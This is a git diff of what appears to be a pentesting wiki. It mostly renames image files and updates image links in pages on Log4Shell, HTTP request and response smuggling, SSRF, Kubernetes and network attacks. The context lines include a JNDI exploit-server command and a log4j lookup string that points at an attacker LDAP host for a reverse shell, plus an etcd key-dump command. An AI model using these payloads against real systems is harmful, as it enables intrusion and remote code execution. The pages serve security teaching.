diff --git a/.gitbook/assets/image (201) (2) (1).png b/.gitbook/assets/image (201) (2) (1).png
new file mode 100644
index 00000000000..99b183e6abc
Binary files /dev/null and b/.gitbook/assets/image (201) (2) (1).png differ
diff --git a/.gitbook/assets/image (201) (2).png b/.gitbook/assets/image (201) (2).png
index 99b183e6abc..e5588b342fe 100644
Binary files a/.gitbook/assets/image (201) (2).png and b/.gitbook/assets/image (201) (2).png differ
diff --git a/.gitbook/assets/image (201).png b/.gitbook/assets/image (201).png
index e5588b342fe..ca3f3bb95dd 100644
Binary files a/.gitbook/assets/image (201).png and b/.gitbook/assets/image (201).png differ
diff --git a/.gitbook/assets/image (465) (2).png b/.gitbook/assets/image (465) (2).png
new file mode 100644
index 00000000000..ee9f710d452
Binary files /dev/null and b/.gitbook/assets/image (465) (2).png differ
diff --git a/.gitbook/assets/image (465).png b/.gitbook/assets/image (465).png
index ee9f710d452..da57d4c62d4 100644
Binary files a/.gitbook/assets/image (465).png and b/.gitbook/assets/image (465).png differ
diff --git a/.gitbook/assets/image (630) (1) (1).png b/.gitbook/assets/image (630) (1) (1).png
new file mode 100644
index 00000000000..1065c7b8297
Binary files /dev/null and b/.gitbook/assets/image (630) (1) (1).png differ
diff --git a/.gitbook/assets/image (630) (1).png b/.gitbook/assets/image (630) (1).png
index 1065c7b8297..c7556058c86 100644
Binary files a/.gitbook/assets/image (630) (1).png and b/.gitbook/assets/image (630) (1).png differ
diff --git a/.gitbook/assets/image (630).png b/.gitbook/assets/image (630).png
index c7556058c86..8e83a1efa62 100644
Binary files a/.gitbook/assets/image (630).png and b/.gitbook/assets/image (630).png differ
diff --git a/.gitbook/assets/image (634) (1).png b/.gitbook/assets/image (634) (1).png
new file mode 100644
index 00000000000..343e3244331
Binary files /dev/null and b/.gitbook/assets/image (634) (1).png differ
diff --git a/.gitbook/assets/image (634).png b/.gitbook/assets/image (634).png
index 343e3244331..a0f7f6ca1d4 100644
Binary files a/.gitbook/assets/image (634).png and b/.gitbook/assets/image (634).png differ
diff --git a/.gitbook/assets/image (635) (1) (1) (1).png b/.gitbook/assets/image (635) (1) (1) (1).png
new file mode 100644
index 00000000000..7d4313a88a5
Binary files /dev/null and b/.gitbook/assets/image (635) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (635) (1) (1).png b/.gitbook/assets/image (635) (1) (1).png
index 7d4313a88a5..343f9d2d540 100644
Binary files a/.gitbook/assets/image (635) (1) (1).png and b/.gitbook/assets/image (635) (1) (1).png differ
diff --git a/.gitbook/assets/image (635) (1).png b/.gitbook/assets/image (635) (1).png
index 343f9d2d540..3f2bb9379f8 100644
Binary files a/.gitbook/assets/image (635) (1).png and b/.gitbook/assets/image (635) (1).png differ
diff --git a/.gitbook/assets/image (635).png b/.gitbook/assets/image (635).png
index 3f2bb9379f8..b08245a6ac4 100644
Binary files a/.gitbook/assets/image (635).png and b/.gitbook/assets/image (635).png differ
diff --git a/.gitbook/assets/image (636) (1).png b/.gitbook/assets/image (636) (1).png
new file mode 100644
index 00000000000..831449f43fd
Binary files /dev/null and b/.gitbook/assets/image (636) (1).png differ
diff --git a/.gitbook/assets/image (636).png b/.gitbook/assets/image (636).png
index 831449f43fd..35d9fa996a3 100644
Binary files a/.gitbook/assets/image (636).png and b/.gitbook/assets/image (636).png differ
diff --git a/.gitbook/assets/image (637) (1) (1).png b/.gitbook/assets/image (637) (1) (1).png
new file mode 100644
index 00000000000..53a92340577
Binary files /dev/null and b/.gitbook/assets/image (637) (1) (1).png differ
diff --git a/.gitbook/assets/image (637) (1).png b/.gitbook/assets/image (637) (1).png
index 53a92340577..0acb0619c51 100644
Binary files a/.gitbook/assets/image (637) (1).png and b/.gitbook/assets/image (637) (1).png differ
diff --git a/.gitbook/assets/image (637).png b/.gitbook/assets/image (637).png
index 0acb0619c51..ee45f10043e 100644
Binary files a/.gitbook/assets/image (637).png and b/.gitbook/assets/image (637).png differ
diff --git a/.gitbook/assets/image (638) (1).png b/.gitbook/assets/image (638) (1).png
new file mode 100644
index 00000000000..4e69d4e127f
Binary files /dev/null and b/.gitbook/assets/image (638) (1).png differ
diff --git a/.gitbook/assets/image (638).png b/.gitbook/assets/image (638).png
index 4e69d4e127f..c11d080e2a9 100644
Binary files a/.gitbook/assets/image (638).png and b/.gitbook/assets/image (638).png differ
diff --git a/.gitbook/assets/image (640) (1).png b/.gitbook/assets/image (640) (1).png
new file mode 100644
index 00000000000..d167e7b188a
Binary files /dev/null and b/.gitbook/assets/image (640) (1).png differ
diff --git a/.gitbook/assets/image (640).png b/.gitbook/assets/image (640).png
index d167e7b188a..bf397199adf 100644
Binary files a/.gitbook/assets/image (640).png and b/.gitbook/assets/image (640).png differ
diff --git a/.gitbook/assets/image (642) (1) (1) (1) (1).png b/.gitbook/assets/image (642) (1) (1) (1) (1).png
new file mode 100644
index 00000000000..4e69d4e127f
Binary files /dev/null and b/.gitbook/assets/image (642) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (642) (1) (1).png b/.gitbook/assets/image (642) (1) (1).png
index 4e69d4e127f..20ad1b02dbc 100644
Binary files a/.gitbook/assets/image (642) (1) (1).png and b/.gitbook/assets/image (642) (1) (1).png differ
diff --git a/.gitbook/assets/image (642) (1).png b/.gitbook/assets/image (642) (1).png
index 20ad1b02dbc..fa15a92ce28 100644
Binary files a/.gitbook/assets/image (642) (1).png and b/.gitbook/assets/image (642) (1).png differ
diff --git a/.gitbook/assets/image (642).png b/.gitbook/assets/image (642).png
index fa15a92ce28..2528d1e23b1 100644
Binary files a/.gitbook/assets/image (642).png and b/.gitbook/assets/image (642).png differ
diff --git a/.gitbook/assets/image (643) (1).png b/.gitbook/assets/image (643) (1).png
new file mode 100644
index 00000000000..1065c7b8297
Binary files /dev/null and b/.gitbook/assets/image (643) (1).png differ
diff --git a/.gitbook/assets/image (643).png b/.gitbook/assets/image (643).png
index 1065c7b8297..3cc6275632f 100644
Binary files a/.gitbook/assets/image (643).png and b/.gitbook/assets/image (643).png differ
diff --git a/.gitbook/assets/image (644) (1).png b/.gitbook/assets/image (644) (1).png
new file mode 100644
index 00000000000..a7091df83d3
Binary files /dev/null and b/.gitbook/assets/image (644) (1).png differ
diff --git a/.gitbook/assets/image (644).png b/.gitbook/assets/image (644).png
index a7091df83d3..e2dd399f6e5 100644
Binary files a/.gitbook/assets/image (644).png and b/.gitbook/assets/image (644).png differ
diff --git a/.gitbook/assets/image (645) (1) (1).png b/.gitbook/assets/image (645) (1) (1).png
new file mode 100644
index 00000000000..d167e7b188a
Binary files /dev/null and b/.gitbook/assets/image (645) (1) (1).png differ
diff --git a/.gitbook/assets/image (645) (1).png b/.gitbook/assets/image (645) (1).png
index d167e7b188a..4f2c9b75835 100644
Binary files a/.gitbook/assets/image (645) (1).png and b/.gitbook/assets/image (645) (1).png differ
diff --git a/.gitbook/assets/image (645).png b/.gitbook/assets/image (645).png
index 4f2c9b75835..22171450f8e 100644
Binary files a/.gitbook/assets/image (645).png and b/.gitbook/assets/image (645).png differ
diff --git a/.gitbook/assets/image (646) (1) (1).png b/.gitbook/assets/image (646) (1) (1).png
new file mode 100644
index 00000000000..d9ab85ec3dc
Binary files /dev/null and b/.gitbook/assets/image (646) (1) (1).png differ
diff --git a/.gitbook/assets/image (646) (1).png b/.gitbook/assets/image (646) (1).png
index d9ab85ec3dc..82b357385a7 100644
Binary files a/.gitbook/assets/image (646) (1).png and b/.gitbook/assets/image (646) (1).png differ
diff --git a/.gitbook/assets/image (646).png b/.gitbook/assets/image (646).png
index 82b357385a7..9393335f01a 100644
Binary files a/.gitbook/assets/image (646).png and b/.gitbook/assets/image (646).png differ
diff --git a/.gitbook/assets/image (647) (1).png b/.gitbook/assets/image (647) (1).png
new file mode 100644
index 00000000000..73a88053e54
Binary files /dev/null and b/.gitbook/assets/image (647) (1).png differ
diff --git a/.gitbook/assets/image (647).png b/.gitbook/assets/image (647).png
index 73a88053e54..103ffa07735 100644
Binary files a/.gitbook/assets/image (647).png and b/.gitbook/assets/image (647).png differ
diff --git a/.gitbook/assets/image (648) (1) (1).png b/.gitbook/assets/image (648) (1) (1).png
new file mode 100644
index 00000000000..0c6b45febbb
Binary files /dev/null and b/.gitbook/assets/image (648) (1) (1).png differ
diff --git a/.gitbook/assets/image (648) (1).png b/.gitbook/assets/image (648) (1).png
index 0c6b45febbb..cca181996e3 100644
Binary files a/.gitbook/assets/image (648) (1).png and b/.gitbook/assets/image (648) (1).png differ
diff --git a/.gitbook/assets/image (648).png b/.gitbook/assets/image (648).png
index cca181996e3..ebba66d4fa2 100644
Binary files a/.gitbook/assets/image (648).png and b/.gitbook/assets/image (648).png differ
diff --git a/.gitbook/assets/image (649) (1) (1).png b/.gitbook/assets/image (649) (1) (1).png
new file mode 100644
index 00000000000..1e258880003
Binary files /dev/null and b/.gitbook/assets/image (649) (1) (1).png differ
diff --git a/.gitbook/assets/image (649) (1).png b/.gitbook/assets/image (649) (1).png
index 1e258880003..0ebce7d028f 100644
Binary files a/.gitbook/assets/image (649) (1).png and b/.gitbook/assets/image (649) (1).png differ
diff --git a/.gitbook/assets/image (649).png b/.gitbook/assets/image (649).png
index 0ebce7d028f..593cd074f20 100644
Binary files a/.gitbook/assets/image (649).png and b/.gitbook/assets/image (649).png differ
diff --git a/.gitbook/assets/image (650).png b/.gitbook/assets/image (650).png
index 4e69d4e127f..137365415bf 100644
Binary files a/.gitbook/assets/image (650).png and b/.gitbook/assets/image (650).png differ
diff --git a/.gitbook/assets/image (652) (1).png b/.gitbook/assets/image (652) (1).png
new file mode 100644
index 00000000000..c3d3f2167fe
Binary files /dev/null and b/.gitbook/assets/image (652) (1).png differ
diff --git a/.gitbook/assets/image (652).png b/.gitbook/assets/image (652).png
index c3d3f2167fe..41d3f269420 100644
Binary files a/.gitbook/assets/image (652).png and b/.gitbook/assets/image (652).png differ
diff --git a/.gitbook/assets/image (653) (1) (1).png b/.gitbook/assets/image (653) (1) (1).png
new file mode 100644
index 00000000000..69603505b63
Binary files /dev/null and b/.gitbook/assets/image (653) (1) (1).png differ
diff --git a/.gitbook/assets/image (653) (1).png b/.gitbook/assets/image (653) (1).png
index 69603505b63..ff11172746f 100644
Binary files a/.gitbook/assets/image (653) (1).png and b/.gitbook/assets/image (653) (1).png differ
diff --git a/.gitbook/assets/image (653).png b/.gitbook/assets/image (653).png
index ff11172746f..242f88bad46 100644
Binary files a/.gitbook/assets/image (653).png and b/.gitbook/assets/image (653).png differ
diff --git a/.gitbook/assets/image (654) (1) (1) (1).png b/.gitbook/assets/image (654) (1) (1) (1).png
new file mode 100644
index 00000000000..c6f279eca93
Binary files /dev/null and b/.gitbook/assets/image (654) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (654) (1) (1).png b/.gitbook/assets/image (654) (1) (1).png
index c6f279eca93..ed00c78eb4d 100644
Binary files a/.gitbook/assets/image (654) (1) (1).png and b/.gitbook/assets/image (654) (1) (1).png differ
diff --git a/.gitbook/assets/image (654) (1).png b/.gitbook/assets/image (654) (1).png
index ed00c78eb4d..bf9170aacae 100644
Binary files a/.gitbook/assets/image (654) (1).png and b/.gitbook/assets/image (654) (1).png differ
diff --git a/.gitbook/assets/image (654).png b/.gitbook/assets/image (654).png
index bf9170aacae..a194b161334 100644
Binary files a/.gitbook/assets/image (654).png and b/.gitbook/assets/image (654).png differ
diff --git a/.gitbook/assets/image (655) (1) (1).png b/.gitbook/assets/image (655) (1) (1).png
new file mode 100644
index 00000000000..c98e9a84212
Binary files /dev/null and b/.gitbook/assets/image (655) (1) (1).png differ
diff --git a/.gitbook/assets/image (655) (1).png b/.gitbook/assets/image (655) (1).png
index c98e9a84212..d0b5c44a3cc 100644
Binary files a/.gitbook/assets/image (655) (1).png and b/.gitbook/assets/image (655) (1).png differ
diff --git a/.gitbook/assets/image (655).png b/.gitbook/assets/image (655).png
index d0b5c44a3cc..aa339e29a17 100644
Binary files a/.gitbook/assets/image (655).png and b/.gitbook/assets/image (655).png differ
diff --git a/.gitbook/assets/image (656) (1) (1).png b/.gitbook/assets/image (656) (1) (1).png
new file mode 100644
index 00000000000..c78cbf31b8f
Binary files /dev/null and b/.gitbook/assets/image (656) (1) (1).png differ
diff --git a/.gitbook/assets/image (656) (1).png b/.gitbook/assets/image (656) (1).png
index c78cbf31b8f..ba23621e93a 100644
Binary files a/.gitbook/assets/image (656) (1).png and b/.gitbook/assets/image (656) (1).png differ
diff --git a/.gitbook/assets/image (656).png b/.gitbook/assets/image (656).png
index ba23621e93a..d979f9cf728 100644
Binary files a/.gitbook/assets/image (656).png and b/.gitbook/assets/image (656).png differ
diff --git a/.gitbook/assets/image (657).png b/.gitbook/assets/image (657).png
index 4e69d4e127f..5e89167c358 100644
Binary files a/.gitbook/assets/image (657).png and b/.gitbook/assets/image (657).png differ
diff --git a/.gitbook/assets/image (658) (1).png b/.gitbook/assets/image (658) (1).png
new file mode 100644
index 00000000000..4a09cf261bc
Binary files /dev/null and b/.gitbook/assets/image (658) (1).png differ
diff --git a/.gitbook/assets/image (658).png b/.gitbook/assets/image (658).png
index 4a09cf261bc..6a984728d2c 100644
Binary files a/.gitbook/assets/image (658).png and b/.gitbook/assets/image (658).png differ
diff --git a/.gitbook/assets/image (659) (1).png b/.gitbook/assets/image (659) (1).png
new file mode 100644
index 00000000000..33e83280f7f
Binary files /dev/null and b/.gitbook/assets/image (659) (1).png differ
diff --git a/.gitbook/assets/image (659).png b/.gitbook/assets/image (659).png
index 33e83280f7f..f7cf31b66c9 100644
Binary files a/.gitbook/assets/image (659).png and b/.gitbook/assets/image (659).png differ
diff --git a/.gitbook/assets/image (661) (1) (1).png b/.gitbook/assets/image (661) (1) (1).png
new file mode 100644
index 00000000000..4c6fb0c4b14
Binary files /dev/null and b/.gitbook/assets/image (661) (1) (1).png differ
diff --git a/.gitbook/assets/image (661) (1).png b/.gitbook/assets/image (661) (1).png
index 4c6fb0c4b14..214f5612c68 100644
Binary files a/.gitbook/assets/image (661) (1).png and b/.gitbook/assets/image (661) (1).png differ
diff --git a/.gitbook/assets/image (661).png b/.gitbook/assets/image (661).png
index 214f5612c68..c8ca928ff4e 100644
Binary files a/.gitbook/assets/image (661).png and b/.gitbook/assets/image (661).png differ
diff --git a/.gitbook/assets/image (662) (1) (1).png b/.gitbook/assets/image (662) (1) (1).png
new file mode 100644
index 00000000000..871fe6ddac5
Binary files /dev/null and b/.gitbook/assets/image (662) (1) (1).png differ
diff --git a/.gitbook/assets/image (662) (1).png b/.gitbook/assets/image (662) (1).png
index 871fe6ddac5..4d6832ea94b 100644
Binary files a/.gitbook/assets/image (662) (1).png and b/.gitbook/assets/image (662) (1).png differ
diff --git a/.gitbook/assets/image (662).png b/.gitbook/assets/image (662).png
index 4d6832ea94b..f0301c0f92d 100644
Binary files a/.gitbook/assets/image (662).png and b/.gitbook/assets/image (662).png differ
diff --git a/README.md b/README.md
index 9f53ab82f0e..912712907b5 100644
--- a/README.md
+++ b/README.md
@@ -30,7 +30,7 @@ If you want to **share some tricks with the community** you can also submit **pu
 
 ### [STM Cyber](https://www.stmcyber.com)
 
-![](<.gitbook/assets/image (642) (1).png>)
+![](<.gitbook/assets/image (642) (1) (1).png>)
 
 [**STM Cyber**](https://www.stmcyber.com) is a great cybersecurity company whose slogan is **HACK THE UNHACKABLE**. They perform their own research and develop their own hacking tools to **offer several valuable cybersecurity services** like pentestings, Red teams and training.
 
diff --git a/cloud-security/github-security/basic-github-information.md b/cloud-security/github-security/basic-github-information.md
index 86fc8eea784..b1050eb423f 100644
--- a/cloud-security/github-security/basic-github-information.md
+++ b/cloud-security/github-security/basic-github-information.md
@@ -63,7 +63,7 @@ You can also **create your own roles** in _https://github.com/organizations/\<or
 
 You can **list the teams created in an organization** in _https://github.com/orgs/\<org\_name>/teams_. Note that to see the teams which are children of other teams you need to access each parent team.
 
-![](<../../.gitbook/assets/image (630).png>)
+![](<../../.gitbook/assets/image (630) (1).png>)
 
 ### Users
 
diff --git a/cloud-security/workspace-security.md b/cloud-security/workspace-security.md
index d6a3f65b12c..4aeee5ba4c8 100644
--- a/cloud-security/workspace-security.md
+++ b/cloud-security/workspace-security.md
@@ -86,7 +86,7 @@ If someone creates a **copy** of that **document** that **contained the App Scri
 
 This method will be able to bypass also the Workspace admin restriction:
 
-![](<../.gitbook/assets/image (662).png>)
+![](<../.gitbook/assets/image (662) (1).png>)
 
 But can be prevented with:
 
diff --git a/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md b/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md
index 6aae0260830..6ab2f348219 100644
--- a/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md
+++ b/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md
@@ -37,7 +37,7 @@ URLs example to abuse JNDI:
 
 ### JNDI Example
 
-![](<../../.gitbook/assets/image (655).png>)
+![](<../../.gitbook/assets/image (655) (1).png>)
 
 Even if you have set a **`PROVIDER_URL`**, you can indicate a different one in a lookup and it will be accessed: `ctx.lookup("<attacker-controlled-url>")` and that is what an attacker will abuse to load arbitrary objects from a system controlled by him.
 
@@ -75,7 +75,7 @@ In case you can **make an app resolve a JNDI LDAP UR**L, you can control the LDA
 
 #### Deserialization exploit
 
-![](<../../.gitbook/assets/image (654) (1).png>)
+![](<../../.gitbook/assets/image (654) (1) (1).png>)
 
 The **exploit is serialized** and will be deserialized.\
 In case `trustURLCodebase` is `true`, an attacker can provide his own classes in the codebase if not, he will need to abuse gadgets in the classpath.
@@ -342,7 +342,7 @@ Use [**JNDI-Exploit-Kit**](https://github.com/pimps/JNDI-Exploit-Kit) to generat
 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -L 10.10.14.10:1389 -P /tmp/cc5.ser
 ```
 
-![](<../../.gitbook/assets/image (642).png>)
+![](<../../.gitbook/assets/image (642) (1).png>)
 
 Now you can easily use a generated JNDI link to exploit the vulnerability and obtain a **reverse shell** just sending to a vulnerable version of log4j: **`${ldap://10.10.14.10:1389/qvrxbu}`**
 
diff --git a/pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.md b/pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.md
index fc9f83e7b0c..325790a9cc3 100644
--- a/pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.md
+++ b/pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.md
@@ -4,7 +4,7 @@
 
 The main origin of this vulnerability is the fact that the **reverse proxy** is going to **talk with the client** using **HTTP/2** but then it will **transform** that **communication** with the **back-end server** to **HTTP/1.1**.
 
-![](<../../.gitbook/assets/image (636).png>)
+![](<../../.gitbook/assets/image (636) (1).png>)
 
 The problem with this approach is that the **user** is going to be able to **inject** unnecessarily **headers** in the **HTTP/2 communication** that probably **won't be checked** by the proxy. But then, when those are **injected blindly in the HTTP/1.1 communication**, **a request smuggling attack can be performed**.
 
@@ -28,7 +28,7 @@ This technique was abused on AWS load balancer, so making sure that the users ac
 
 This is exactly the same technique as before, but checking the requests James noticed that clients were asking to send him their credentials, so he just modified his server to allow CORS to send him peoples credentials:
 
-![](<../../.gitbook/assets/image (662) (1).png>)
+![](<../../.gitbook/assets/image (662) (1) (1).png>)
 
 ### H2.TE via Request Header Injection
 
@@ -36,7 +36,7 @@ This is exactly the same technique as before, but checking the requests James no
 
 In this case **the header Transfer-Encoding was injected**.
 
-![](<../../.gitbook/assets/image (648) (1).png>)
+![](<../../.gitbook/assets/image (648) (1) (1).png>)
 
 ### H2.TE via Header Name Injection
 
@@ -46,19 +46,19 @@ HTTP/2 on some servers lets you put a **colon in the header name, and with a \r\
 
 Note that if you put just the new line characters sending a header without content, the request is going to be treated as **invalid**:
 
-![](<../../.gitbook/assets/image (647).png>)
+![](<../../.gitbook/assets/image (647) (1).png>)
 
 ### H2.TE via Request LIne Injection
 
 In this case the injection was performed inside the request line:
 
-![](<../../.gitbook/assets/image (640).png>)
+![](<../../.gitbook/assets/image (640) (1).png>)
 
 ### URL Prefix Injection
 
 Inside the scheme of the HTTP/2 connection you might be able to send a full URL that will overwrite the one indicated in the path:
 
-![](<../../.gitbook/assets/image (661).png>)
+![](<../../.gitbook/assets/image (661) (1).png>)
 
 ### Request Line Injection via spaces
 
@@ -72,7 +72,7 @@ Note that **even** with that **restriction** you still can perform attacks like
 
 Usually this restriction doesn't exist so you can **smuggle request into the connection between the reverse proxy and the back end** that other people are using, but it's even **possible** that the **proxy** doesn't **even reuse a connection with connections from the same IP** (pretty heavy restriction for this kind of attack).
 
-![](<../../.gitbook/assets/image (646) (1).png>)
+![](<../../.gitbook/assets/image (646) (1) (1).png>)
 
 In the heaviest restriction (no connection reuse) you will detect the vulnerability with the Time Based technique, but then testing it you will find that it's a "false positive".
 
@@ -84,7 +84,7 @@ The **problem** with **HTTP/1.1** is that if you **receive 2 HTTP responses** yo
 
 However, this technique can be used **in HTTP/2** because if the endpoint was **vulnerable** and you smuggled one request, you will see the **headers of the response to the smuggled request in the response from the reverse proxy**:
 
-![](<../../.gitbook/assets/image (652).png>)
+![](<../../.gitbook/assets/image (652) (1).png>)
 
 ### Tunnel-vision Problem
 
@@ -98,7 +98,7 @@ However, the **HEAD** request **doesn't contain a body** but it usually **contai
 
 If you find a **POST** **parameter** inside the application whose **content** is going to be **reflected** in the **response**, then you can try to inject HTTP/1.1 \r\n characters inside a HTTP/2 request header so the newly injected headers by the proxy are going to be appended in the POST parameter that will be reflected in the response:
 
-![](<../../.gitbook/assets/image (656) (1).png>)
+![](<../../.gitbook/assets/image (656) (1) (1).png>)
 
 Note that in this case the **attacker** just cares about the **response** to the **first** **request**, he doesn't need to read the request to the smuggled invalid second request.
 
@@ -112,7 +112,7 @@ In this scenario a **HEAD** request to the **URL** **whose** **cache** is going
 
 Due to the fact the the **HEAD response contains the `Content-Type: text/html`** and because the reverse proxy thinks that the **whole response to the smuggled request is the body of the HEAD** request, the **XSS payload** is going to be **treated as HTML** even if the page wasn't vulnerable to XSS.
 
-![](<../../.gitbook/assets/image (659).png>)
+![](<../../.gitbook/assets/image (659) (1).png>)
 
 ## Hidden HTTP/2
 
diff --git a/pentesting-web/http-response-smuggling-desync.md b/pentesting-web/http-response-smuggling-desync.md
index 45a8bff2e2a..d4740eca013 100644
--- a/pentesting-web/http-response-smuggling-desync.md
+++ b/pentesting-web/http-response-smuggling-desync.md
@@ -14,7 +14,7 @@ HTTP/1.1 allows to ask for **different resources without needing to wait for pre
 
 However, there is a problem desynchronising the responses queue. If an attacker send a HTTP Response smuggling attack and the responses to the **initial request and the smuggled one are responded immediately**, the smuggled response won't be inserted inside the queue of the victim response but will **just be discarded as an error**.
 
-![](<../.gitbook/assets/image (635) (1) (1).png>)
+![](<../.gitbook/assets/image (635) (1) (1) (1).png>)
 
 Therefore, it's needed that the **smuggled** **request** **takes more time to be processed** inside the back-end server. Therefore, by the time the smuggled request is processed, the communication with the attacker will be over.
 
@@ -22,9 +22,9 @@ If in this specific situation a **victim has sent a request** and the **smuggled
 
 Moreover, is the **attacker then perform a request** and the **legitimate response** to the **victim** request is **answered** **before** the attackers request. The **response to the victim is going to be sent to the attacker**, **stealing** the response to the victim (which can contains for example the header **Set-Cookie**).
 
-![](<../.gitbook/assets/image (658).png>)
+![](<../.gitbook/assets/image (658) (1).png>)
 
-![](<../.gitbook/assets/image (655) (1).png>)
+![](<../.gitbook/assets/image (655) (1) (1).png>)
 
 ### Multiple Nested Injections
 
@@ -52,7 +52,7 @@ First, the attacker send a payload containing a **final POST request with the re
 
 Then, once the **initial request** (blue) was **processed** and **while** the **sleepy** one is being processed (yellow) the **next request that arrives from a victim** is going to be **appended in the queue just after the reflected parameter**:
 
-![](<../.gitbook/assets/image (634).png>)
+![](<../.gitbook/assets/image (634) (1).png>)
 
 Then, the **victim** will **receive** the **response to the sleepy** request and if in the meantime the **attacker** **sent** **another** **request**, the **response from the reflected content request will be sent to him**.
 
@@ -80,7 +80,7 @@ Then, the **victim** will **receive** the **response** from the **HEAD** request
 
 Following the previous example, knowing that you can **control the body** of the request whose response is going to receive the victim and that a **HEAD** **response** usually contains in its headers the **Content-Type and the Content-Length**, you can **send a request like the following** one to **cause XSS** in the victim without the page being vulnerable to XSS:
 
-![](<../.gitbook/assets/image (654) (1) (1).png>)
+![](<../.gitbook/assets/image (654) (1) (1) (1).png>)
 
 ### Cache Poisoning
 
@@ -88,7 +88,7 @@ Abusing the previously commented response desynchronisation Content Confusion at
 
 Malicious request containing the XSS payload:
 
-![](<../.gitbook/assets/image (644).png>)
+![](<../.gitbook/assets/image (644) (1).png>)
 
 Malicious response to the victim that contains the header that indicates to the cache to store the response:
 
@@ -102,7 +102,7 @@ Note that in this case if the **"victim" is the attacker** he can now perform **
 
 This attack is similar to the previous one, but **instead of injecting a payload inside the cache, the attacker will be caching victim information inside of the cache:**
 
-![](<../.gitbook/assets/image (630) (1).png>)
+![](<../.gitbook/assets/image (630) (1) (1).png>)
 
 ### Response Splitting
 
@@ -112,11 +112,11 @@ In order to achieve this, the attacker needs to find an endpoint of the web appl
 
 He will send a **exploit** like:
 
-![](<../.gitbook/assets/image (649) (1).png>)
+![](<../.gitbook/assets/image (649) (1) (1).png>)
 
 After the first request is resolved and sent back to the attacker, the **victims request is added into the queue**:
 
-![](<../.gitbook/assets/image (661) (1).png>)
+![](<../.gitbook/assets/image (661) (1) (1).png>)
 
 The victim will receive as response the **HEAD response + the content of the second request response (containing part of the reflected data):**
 
diff --git a/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md b/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md
index 15cff3feeed..815d8c1bb6d 100644
--- a/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md
+++ b/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md
@@ -66,7 +66,7 @@ http://bugbounty.dod.network = 127.0.0.2 (localhost)
 spoofed.burpcollaborator.net = 127.0.0.1
 ```
 
-![](<../../.gitbook/assets/image (649).png>)
+![](<../../.gitbook/assets/image (649) (1).png>)
 
 ### Domain Parser
 
diff --git a/pentesting/1883-pentesting-mqtt-mosquitto.md b/pentesting/1883-pentesting-mqtt-mosquitto.md
index f8ff7b2d453..00b222ee6ad 100644
--- a/pentesting/1883-pentesting-mqtt-mosquitto.md
+++ b/pentesting/1883-pentesting-mqtt-mosquitto.md
@@ -15,7 +15,7 @@ PORT     STATE SERVICE                 REASON
 
 MQTT brokers send a **CONNACK** packet in **response** to a CONNECT packet. The **return code 0x00** indicates the credentials are valid and the return code **0x05 indicates they aren't. 0x05 example:**
 
-![](<../.gitbook/assets/image (645).png>)
+![](<../.gitbook/assets/image (645) (1).png>)
 
 ### ****[**Brute-Force MQTT**](../brute-force.md#mqtt)****
 
diff --git a/pentesting/pentesting-kubernetes/exposing-services-in-kubernetes.md b/pentesting/pentesting-kubernetes/exposing-services-in-kubernetes.md
index b884d4325cc..e11c7668ec2 100644
--- a/pentesting/pentesting-kubernetes/exposing-services-in-kubernetes.md
+++ b/pentesting/pentesting-kubernetes/exposing-services-in-kubernetes.md
@@ -60,7 +60,7 @@ _This method requires you to run `kubectl` as an **authenticated user**._
 
 **NodePort opens a specific port on all the Nodes** (the VMs), and any **traffic** that is sent to this port is **forwarded to the service**. This is a really bad option usually.
 
-![](<../../.gitbook/assets/image (635) (1).png>)
+![](<../../.gitbook/assets/image (635) (1) (1).png>)
 
 An example of NodePort specification:
 
@@ -87,7 +87,7 @@ If you **don't specify** the **nodePort** in the yaml (it's the port that will b
 
 Exposes the Service externally **using a cloud provider's load balancer**. On GKE, this will spin up a [Network Load Balancer](https://cloud.google.com/compute/docs/load-balancing/network/) that will give you a single IP address that will forward all traffic to your service.
 
-![](<../../.gitbook/assets/image (654).png>)
+![](<../../.gitbook/assets/image (654) (1).png>)
 
 You have to pay for a LoadBalancer per exposed service, which can get expensive.
 
@@ -139,7 +139,7 @@ Unlike all the above examples, **Ingress is NOT a type of service**. Instead, it
 
 You can do a lot of different things with an Ingress, and there are **many types of Ingress controllers that have different capabilities**.
 
-![](<../../.gitbook/assets/image (653).png>)
+![](<../../.gitbook/assets/image (653) (1).png>)
 
 The default GKE ingress controller will spin up a [HTTP(S) Load Balancer](https://cloud.google.com/compute/docs/load-balancing/http/) for you. This will let you do both path based and subdomain based routing to backend services. For example, you can send everything on foo.yourdomain.com to the foo service, and everything under the yourdomain.com/bar/ path to the bar service.
 
diff --git a/pentesting/pentesting-kubernetes/pentesting-kubernetes-from-the-outside.md b/pentesting/pentesting-kubernetes/pentesting-kubernetes-from-the-outside.md
index 5953752222a..3131d2b8fdc 100644
--- a/pentesting/pentesting-kubernetes/pentesting-kubernetes-from-the-outside.md
+++ b/pentesting/pentesting-kubernetes/pentesting-kubernetes-from-the-outside.md
@@ -150,7 +150,7 @@ etcdctl --endpoints=http://<MASTER-IP>:2379 get / --prefix --keys-only
 
 The [**Kubelet documentation**](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/) explains that by **default anonymous acce**ss to the service is **allowed:**
 
-![](<../../.gitbook/assets/image (637).png>)
+![](<../../.gitbook/assets/image (637) (1).png>)
 
 The **Kubelet** service **API is not documented**, but the source code can be found here and finding the exposed endpoints is as easy as **running**:
 
diff --git a/pentesting/pentesting-network/README.md b/pentesting/pentesting-network/README.md
index 4f1044c3ab6..33642d28dd2 100644
--- a/pentesting/pentesting-network/README.md
+++ b/pentesting/pentesting-network/README.md
@@ -299,7 +299,7 @@ yersinia -I #Interactive mode
 yersinia -G #For graphic mode
 ```
 
-![](<../../.gitbook/assets/image (646).png>)
+![](<../../.gitbook/assets/image (646) (1).png>)
 
 To access the VLAN packets
 
